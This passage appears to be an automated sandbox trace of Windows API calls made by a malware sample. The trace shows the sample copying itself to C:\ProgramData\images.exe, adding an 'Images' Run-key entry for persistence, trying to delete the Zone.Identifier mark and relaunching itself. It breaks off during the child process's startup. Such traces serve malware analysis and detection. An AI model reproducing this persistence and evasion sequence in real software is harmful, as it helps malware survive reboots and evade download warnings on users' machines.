flAllocationType=0x3000, flProtect=0x4) returned 0xce0000 [0074.654] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v5vYBIG3hWD7d5JW.exe") returned 58 [0074.654] lstrcpyW (in: lpString1=0xce0000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v5vYBIG3hWD7d5JW.exe" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v5vYBIG3hWD7d5JW.exe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v5vYBIG3hWD7d5JW.exe" [0074.654] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v5vYBIG3hWD7d5JW.exe") returned 58 [0074.654] VirtualAlloc (lpAddress=0x0, dwSize=0x76, flAllocationType=0x3000, flProtect=0x4) returned 0xcf0000 [0074.655] lstrcpyW (in: lpString1=0xcf0000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v5vYBIG3hWD7d5JW.exe" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v5vYBIG3hWD7d5JW.exe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v5vYBIG3hWD7d5JW.exe" [0074.655] VirtualFree (lpAddress=0xce0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.655] GetProcessHeap () returned 0x960000 [0074.655] RtlAllocateHeap (HeapHandle=0x960000, Flags=0x0, Size=0xa) returned 0x987980 [0074.655] lstrlenA (lpString="curJGjcaG") returned 9 [0074.655] lstrlenA (lpString="curJGjcaG") returned 9 [0074.655] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x4) returned 0xce0000 [0074.655] lstrcpyA (in: lpString1=0xce0000, lpString2="curJGjcaG" | out: lpString1="curJGjcaG") returned="curJGjcaG" [0074.655] lstrlenA (lpString="curJGjcaG") returned 9 [0074.655] lstrlenA (lpString="curJGjcaG") returned 9 [0074.655] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x2, lpMultiByteStr=0xce0000, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0074.656] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0xd00000 [0074.656] lstrlenA (lpString="curJGjcaG") returned 9 [0074.656] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0xce0000, cbMultiByte=-1, lpWideCharStr=0xd00000, cchWideChar=22 | out: lpWideCharStr="curJGjcaG") returned 10 [0074.656] lstrlenW (lpString="curJGjcaG") returned 9 [0074.656] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0xd10000 [0074.656] lstrlenW (lpString="curJGjcaG") returned 9 [0074.656] lstrcpyW (in: lpString1=0xd10000, lpString2="curJGjcaG" | out: lpString1="curJGjcaG") returned="curJGjcaG" [0074.656] lstrlenW (lpString="curJGjcaG") returned 9 [0074.656] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0xd20000 [0074.657] lstrcpyW (in: lpString1=0xd20000, lpString2="curJGjcaG" | out: lpString1="curJGjcaG") returned="curJGjcaG" [0074.657] VirtualFree (lpAddress=0xd10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.657] VirtualFree (lpAddress=0xd00000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.657] lstrlenW (lpString="curJGjcaG") returned 9 [0074.657] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0xd00000 [0074.657] lstrcatW (in: lpString1="", lpString2="curJGjcaG" | out: lpString1="curJGjcaG") returned="curJGjcaG" [0074.657] VirtualFree (lpAddress=0xd20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.657] VirtualFree (lpAddress=0xce0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.658] GetProcessHeap () returned 0x960000 [0074.658] HeapFree (in: hHeap=0x960000, dwFlags=0x0, lpMem=0x987980 | out: hHeap=0x960000) returned 1 [0074.658] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ZO6KLPO6XJ", Reserved=0x0, lpClass=0x0, dwOptions=0x1, samDesired=0x1, lpSecurityAttributes=0x0, phkResult=0x31f450, lpdwDisposition=0x31f364 | out: phkResult=0x31f450*=0x1dc, lpdwDisposition=0x31f364*=0x1) returned 0x0 [0074.658] RegCloseKey (hKey=0x1dc) returned 0x0 [0074.658] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x31f170, csidl=35, fCreate=0 | out: pszPath="C:\\ProgramData") returned 1 [0074.661] lstrlenW (lpString="C:\\ProgramData") returned 14 [0074.662] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0xce0000 [0074.662] lstrlenW (lpString="C:\\ProgramData") returned 14 [0074.662] lstrcpyW (in: lpString1=0xce0000, lpString2="C:\\ProgramData" | out: lpString1="C:\\ProgramData") returned="C:\\ProgramData" [0074.662] lstrlenW (lpString="C:\\ProgramData") returned 14 [0074.662] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0xd10000 [0074.662] lstrcpyW (in: lpString1=0xd10000, lpString2="C:\\ProgramData" | out: lpString1="C:\\ProgramData") returned="C:\\ProgramData" [0074.662] VirtualFree (lpAddress=0xce0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.662] SHCreateDirectoryExW (hwnd=0x0, pszPath="C:\\ProgramData" (normalized: "c:\\programdata"), psa=0x0) returned 183 [0074.662] lstrlenW (lpString="images.exe") returned 10 [0074.662] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0xce0000 [0074.663] lstrcpyW (in: lpString1=0xce0000, lpString2="images.exe" | out: lpString1="images.exe") returned="images.exe" [0074.663] lstrlenW (lpString="\\") returned 1 [0074.663] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0xd20000 [0074.663] lstrlenW (lpString="\\") returned 1 [0074.663] lstrcpyW (in: lpString1=0xd20000, lpString2="\\" | out: lpString1="\\") returned="\\" [0074.663] lstrlenW (lpString="\\") returned 1 [0074.663] lstrlenW (lpString="C:\\ProgramData") returned 14 [0074.663] VirtualQuery (in: lpAddress=0xd10000, lpBuffer=0x31f31c, dwLength=0x1c | out: lpBuffer=0x31f31c*(BaseAddress=0xd10000, AllocationBase=0xd10000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0074.663] VirtualAlloc (lpAddress=0x0, dwSize=0x22, flAllocationType=0x3000, flProtect=0x4) returned 0xd30000 [0074.663] VirtualFree (lpAddress=0xd10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.663] lstrcatW (in: lpString1="C:\\ProgramData", lpString2="\\" | out: lpString1="C:\\ProgramData\\") returned="C:\\ProgramData\\" [0074.664] VirtualFree (lpAddress=0xd20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.664] lstrlenW (lpString="images.exe") returned 10 [0074.664] lstrlenW (lpString="C:\\ProgramData\\") returned 15 [0074.664] VirtualQuery (in: lpAddress=0xd30000, lpBuffer=0x31f32c, dwLength=0x1c | out: lpBuffer=0x31f32c*(BaseAddress=0xd30000, AllocationBase=0xd30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0074.664] VirtualAlloc (lpAddress=0x0, dwSize=0x36, flAllocationType=0x3000, flProtect=0x4) returned 0xd10000 [0074.664] VirtualFree (lpAddress=0xd30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.664] lstrcatW (in: lpString1="C:\\ProgramData\\", lpString2="images.exe" | out: lpString1="C:\\ProgramData\\images.exe") returned="C:\\ProgramData\\images.exe" [0074.664] VirtualFree (lpAddress=0xce0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.664] CopyFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v5vYBIG3hWD7d5JW.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v5vybig3hwd7d5jw.exe"), lpNewFileName="C:\\ProgramData\\images.exe" (normalized: "c:\\programdata\\images.exe"), bFailIfExists=0) returned 1 [0074.707] lstrlenW (lpString="C:\\ProgramData\\images.exe") returned 25 [0074.707] GetProcessHeap () returned 0x960000 [0074.707] RtlAllocateHeap (HeapHandle=0x960000, Flags=0x0, Size=0x34) returned 0x990718 [0074.707] GetProcessHeap () returned 0x960000 [0074.707] RtlAllocateHeap (HeapHandle=0x960000, Flags=0x0, Size=0x32) returned 0x990758 [0074.707] GetProcessHeap () returned 0x960000 [0074.707] RtlAllocateHeap (HeapHandle=0x960000, Flags=0x0, Size=0x34) returned 0x990798 [0074.707] GetProcessHeap () returned 0x960000 [0074.707] RtlAllocateHeap (HeapHandle=0x960000, Flags=0x0, Size=0x34) returned 0x9907d8 [0074.707] GetProcessHeap () returned 0x960000 [0074.707] HeapFree (in: hHeap=0x960000, dwFlags=0x0, lpMem=0x990798 | out: hHeap=0x960000) returned 1 [0074.707] GetProcessHeap () returned 0x960000 [0074.707] HeapFree (in: hHeap=0x960000, dwFlags=0x0, lpMem=0x990758 | out: hHeap=0x960000) returned 1 [0074.707] GetProcessHeap () returned 0x960000 [0074.707] HeapFree (in: hHeap=0x960000, dwFlags=0x0, lpMem=0x990718 | out: hHeap=0x960000) returned 1 [0074.707] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ZO6KLPO6XJ", ulOptions=0x0, samDesired=0xf003f, phkResult=0x31f450 | out: phkResult=0x31f450*=0x1e0) returned 0x0 [0074.708] RegSetValueExW (in: hKey=0x1e0, lpValueName="inst", Reserved=0x0, dwType=0x3, lpData=0x9907d8*, cbData=0x34 | out: lpData=0x9907d8*) returned 0x0 [0074.708] GetProcessHeap () returned 0x960000 [0074.708] HeapFree (in: hHeap=0x960000, dwFlags=0x0, lpMem=0x9907d8 | out: hHeap=0x960000) returned 1 [0074.708] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", ulOptions=0x0, samDesired=0x20006, phkResult=0x31f454 | out: phkResult=0x31f454*=0x1dc) returned 0x0 [0074.708] lstrlenW (lpString="Images") returned 6 [0074.708] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xce0000 [0074.708] lstrcpyW (in: lpString1=0xce0000, lpString2="Images" | out: lpString1="Images") returned="Images" [0074.708] lstrlenW (lpString="C:\\ProgramData\\images.exe") returned 25 [0074.708] GetProcessHeap () returned 0x960000 [0074.709] RtlAllocateHeap (HeapHandle=0x960000, Flags=0x0, Size=0x34) returned 0x9907d8 [0074.709] RegSetValueExW (in: hKey=0x1dc, lpValueName="Images", Reserved=0x0, dwType=0x1, lpData="C:\\ProgramData\\images.exe", cbData=0x34 | out: lpData="C:\\ProgramData\\images.exe") returned 0x0 [0074.709] VirtualFree (lpAddress=0xce0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.710] GetProcessHeap () returned 0x960000 [0074.710] HeapFree (in: hHeap=0x960000, dwFlags=0x0, lpMem=0x9907d8 | out: hHeap=0x960000) returned 1 [0074.710] RegCloseKey (hKey=0x1dc) returned 0x0 [0074.710] lstrlenW (lpString="C:\\ProgramData\\images.exe") returned 25 [0074.710] VirtualAlloc (lpAddress=0x0, dwSize=0x34, flAllocationType=0x3000, flProtect=0x4) returned 0xce0000 [0074.710] lstrlenW (lpString="C:\\ProgramData\\images.exe") returned 25 [0074.710] lstrcpyW (in: lpString1=0xce0000, lpString2="C:\\ProgramData\\images.exe" | out: lpString1="C:\\ProgramData\\images.exe") returned="C:\\ProgramData\\images.exe" [0074.710] lstrlenW (lpString=":Zone.Identifier") returned 16 [0074.710] VirtualAlloc (lpAddress=0x0, dwSize=0x22, flAllocationType=0x3000, flProtect=0x4) returned 0xd20000 [0074.710] lstrlenW (lpString=":Zone.Identifier") returned 16 [0074.710] lstrcpyW (in: lpString1=0xd20000, lpString2=":Zone.Identifier" | out: lpString1=":Zone.Identifier") returned=":Zone.Identifier" [0074.710] lstrlenW (lpString=":Zone.Identifier") returned 16 [0074.710] lstrlenW (lpString="C:\\ProgramData\\images.exe") returned 25 [0074.711] VirtualQuery (in: lpAddress=0xce0000, lpBuffer=0x31f32c, dwLength=0x1c | out: lpBuffer=0x31f32c*(BaseAddress=0xce0000, AllocationBase=0xce0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0074.711] VirtualAlloc (lpAddress=0x0, dwSize=0x56, flAllocationType=0x3000, flProtect=0x4) returned 0xd30000 [0074.711] VirtualFree (lpAddress=0xce0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.711] lstrcatW (in: lpString1="C:\\ProgramData\\images.exe", lpString2=":Zone.Identifier" | out: lpString1="C:\\ProgramData\\images.exe:Zone.Identifier") returned="C:\\ProgramData\\images.exe:Zone.Identifier" [0074.711] VirtualFree (lpAddress=0xd20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.711] DeleteFileW (lpFileName="C:\\ProgramData\\images.exe:Zone.Identifier" (normalized: "c:\\programdata\\images.exe:zone.identifier")) returned 0 [0074.711] VirtualFree (lpAddress=0xd30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.712] VirtualFree (lpAddress=0xd00000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.712] VirtualFree (lpAddress=0xcf0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.712] lstrlenW (lpString="C:\\ProgramData\\images.exe") returned 25 [0074.712] VirtualAlloc (lpAddress=0x0, dwSize=0x34, flAllocationType=0x3000, flProtect=0x4) returned 0xce0000 [0074.712] lstrcpyW (in: lpString1=0xce0000, lpString2="C:\\ProgramData\\images.exe" | out: lpString1="C:\\ProgramData\\images.exe") returned="C:\\ProgramData\\images.exe" [0074.712] CreateProcessW (in: lpApplicationName="C:\\ProgramData\\images.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x31f368*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x31f3ac | out: lpCommandLine=0x0, lpProcessInformation=0x31f3ac*(hProcess=0x1e4, hThread=0x1dc, dwProcessId=0x8d4, dwThreadId=0x8e4)) returned 1 [0077.430] VirtualFree (lpAddress=0xce0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.431] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0077.431] VirtualFree (lpAddress=0xcd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.431] GetProcessHeap () returned 0x960000 [0077.431] HeapFree (in: hHeap=0x960000, dwFlags=0x0, lpMem=0x98fd20 | out: hHeap=0x960000) returned 1 [0077.431] VirtualFree (lpAddress=0xcc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.431] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0077.431] VirtualFree (lpAddress=0xcb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.432] VirtualFree (lpAddress=0xca0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.432] VirtualFree (lpAddress=0xc90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.432] GetProcessHeap () returned 0x960000 [0077.432] HeapFree (in: hHeap=0x960000, dwFlags=0x0, lpMem=0x99aff8 | out: hHeap=0x960000) returned 1 [0077.432] WSACleanup () returned 0 [0077.432] ReleaseMutex (hMutex=0x1d0) returned 0 [0077.432] CloseHandle (hObject=0x1d0) returned 1 [0077.432] VirtualFree (lpAddress=0xc40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.433] RegCloseKey (hKey=0x1e0) returned 0x0 [0077.433] GetProcessHeap () returned 0x960000 [0077.433] HeapFree (in: hHeap=0x960000, dwFlags=0x0, lpMem=0x98fb18 | out: hHeap=0x960000) returned 1 [0077.433] VirtualFree (lpAddress=0xc30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.433] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0077.433] VirtualFree (lpAddress=0xc20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.433] VirtualFree (lpAddress=0xc10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.433] VirtualFree (lpAddress=0xc00000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.434] GetProcessHeap () returned 0x960000 [0077.434] HeapFree (in: hHeap=0x960000, dwFlags=0x0, lpMem=0x99afb8 | out: hHeap=0x960000) returned 1 [0077.434] VirtualFree (lpAddress=0xd10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.434] VirtualFree (lpAddress=0xc70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.434] VirtualFree (lpAddress=0xc50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.434] VirtualFree (lpAddress=0xc80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.435] VirtualFree (lpAddress=0xc60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.435] GetProcessHeap () returned 0x960000 [0077.435] HeapFree (in: hHeap=0x960000, dwFlags=0x0, lpMem=0x99b1c0 | out: hHeap=0x960000) returned 1 [0077.435] VirtualFree (lpAddress=0xbf0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.435] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0077.435] VirtualFree (lpAddress=0x950000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.435] VirtualFree (lpAddress=0x940000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.435] VirtualFree (lpAddress=0x930000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.436] GetProcessHeap () returned 0x960000 [0077.436] HeapFree (in: hHeap=0x960000, dwFlags=0x0, lpMem=0x9d0f98 | out: hHeap=0x960000) returned 1 [0077.436] CoUninitialize () [0077.442] CoUninitialize () [0077.446] VirtualFree (lpAddress=0x97e6b8, dwSize=0x0, dwFreeType=0x8000) returned 0 [0077.446] VirtualFree (lpAddress=0x97e710, dwSize=0x0, dwFreeType=0x8000) returned 0 [0077.446] ReleaseMutex (hMutex=0xb8) returned 0 [0077.446] CloseHandle (hObject=0xb8) returned 1 [0077.446] VirtualFree (lpAddress=0x1b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.446] VirtualFree (lpAddress=0x160000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.447] VirtualFree (lpAddress=0x150000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.447] VirtualFree (lpAddress=0x140000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.447] VirtualFree (lpAddress=0x130000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.447] VirtualFree (lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.447] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0077.447] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0077.447] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0077.448] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0077.448] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0077.448] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0077.448] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0077.448] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0077.448] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0077.448] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0077.448] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0077.448] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0077.448] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0077.448] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0077.448] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0077.448] ReleaseMutex (hMutex=0x198) returned 0 [0077.448] CloseHandle (hObject=0x198) returned 1 [0077.448] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0077.448] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0077.448] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0077.448] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0077.449] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0077.449] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0077.449] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0077.449] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0077.449] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0077.449] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0077.449] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0077.449] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0077.449] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0077.449] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0077.449] VirtualFree (lpAddress=0x710000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.449] VirtualFree (lpAddress=0x700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.449] VirtualFree (lpAddress=0x210000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.450] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0077.450] VirtualFree (lpAddress=0x1d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.450] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0077.450] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0077.450] WSACleanup () returned 0 [0077.450] ReleaseMutex (hMutex=0x1c4) returned 0 [0077.450] CloseHandle (hObject=0x1c4) returned 1 [0077.450] VirtualFree (lpAddress=0x200000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.450] WSACleanup () returned 0 [0077.545] ReleaseMutex (hMutex=0x1b0) returned 0 [0077.545] CloseHandle (hObject=0x1b0) returned 1 [0077.545] VirtualFree (lpAddress=0x1f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.546] ReleaseMutex (hMutex=0x1c8) returned 0 [0077.546] CloseHandle (hObject=0x1c8) returned 1 [0077.546] ExitProcess (uExitCode=0x0) Process: id = "6" image_name = "images.exe" filename = "c:\\programdata\\images.exe" page_root = "0x1b642000" os_pid = "0x8d4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0x874" cmd_line = "\"C:\\ProgramData\\images.exe\"" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 25 os_tid = 0x8e4 [0078.469] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0078.970] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll", nBufferLength=0x105, lpBuffer=0x47e8dc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll", lpFilePart=0x0) returned 0x77 [0078.980] IsAppThemed () returned 0x1 [0078.982] CoTaskMemAlloc (cb=0xf0) returned 0x893df0 [0078.983] CreateActCtxA (pActCtx=0x47edd8) returned 0x8a041c [0078.985] CoTaskMemFree (pv=0x893df0) [0078.990] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLNAME") returned 0xc16c [0078.990] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLTYPE") returned 0xc16a [0079.269] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\images.exe.config", nBufferLength=0x105, lpBuffer=0x47e77c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\images.exe.config", lpFilePart=0x0) returned 0x20 [0079.269] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\images.exe.config", nBufferLength=0x105, lpBuffer=0x47e728, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\images.exe.config", lpFilePart=0x0) returned 0x20 [0079.274] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\images.exe", nBufferLength=0x105, lpBuffer=0x47e784, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\images.exe", lpFilePart=0x0) returned 0x19 [0079.274] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\images.exe", nBufferLength=0x105, lpBuffer=0x47e6fc, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\images.exe", lpFilePart=0x0) returned 0x19 [0079.274] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\images.exe", nBufferLength=0x105, lpBuffer=0x47e754, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\images.exe", lpFilePart=0x0) returned 0x19 [0079.275] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x47ebb4) returned 1 [0079.276] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\images.exe" (normalized: "c:\\programdata\\images.exe"), fInfoLevelId=0x0, lpFileInformation=0x47ec30 | out: lpFileInformation=0x47ec30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x74793450, ftCreationTime.dwHighDateTime=0x1d6a092, ftLastAccessTime.dwLowDateTime=0x74793450, ftLastAccessTime.dwHighDateTime=0x1d6a092, ftLastWriteTime.dwLowDateTime=0x127e2500, ftLastWriteTime.dwHighDateTime=0x1d6a090, nFileSizeHigh=0x0, nFileSizeLow=0xb7400)) returned 1 [0079.276] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x47ebb0) returned 1 [0079.277] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\ProgramData\\images.exe", lpdwHandle=0x47eca4 | out: lpdwHandle=0x47eca4) returned 0x6ac [0079.278] GetFileVersionInfoW (in: lptstrFilename="C:\\ProgramData\\images.exe", dwHandle=0x0, dwLen=0x6ac, lpData=0x21b8bc4 | out: lpData=0x21b8bc4) returned 1 [0079.279] VerQueryValueW (in: pBlock=0x21b8bc4, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x47ec78, puLen=0x47ec74 | out: lplpBuffer=0x47ec78*=0x21b8c60, puLen=0x47ec74) returned 1 [0079.282] VerQueryValueW (in: pBlock=0x21b8bc4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x47ebf8, puLen=0x47ebf4 | out: lplpBuffer=0x47ebf8*=0x21b8d00, puLen=0x47ebf4) returned 1 [0079.282] VerQueryValueW (in: pBlock=0x21b8bc4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x47ebf8, puLen=0x47ebf4 | out: lplpBuffer=0x47ebf8*=0x21b8d30, puLen=0x47ebf4) returned 1 [0079.282] VerQueryValueW (in: pBlock=0x21b8bc4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x47ebf8, puLen=0x47ebf4 | out: lplpBuffer=0x47ebf8*=0x21b8d64, puLen=0x47ebf4) returned 1 [0079.282] VerQueryValueW (in: 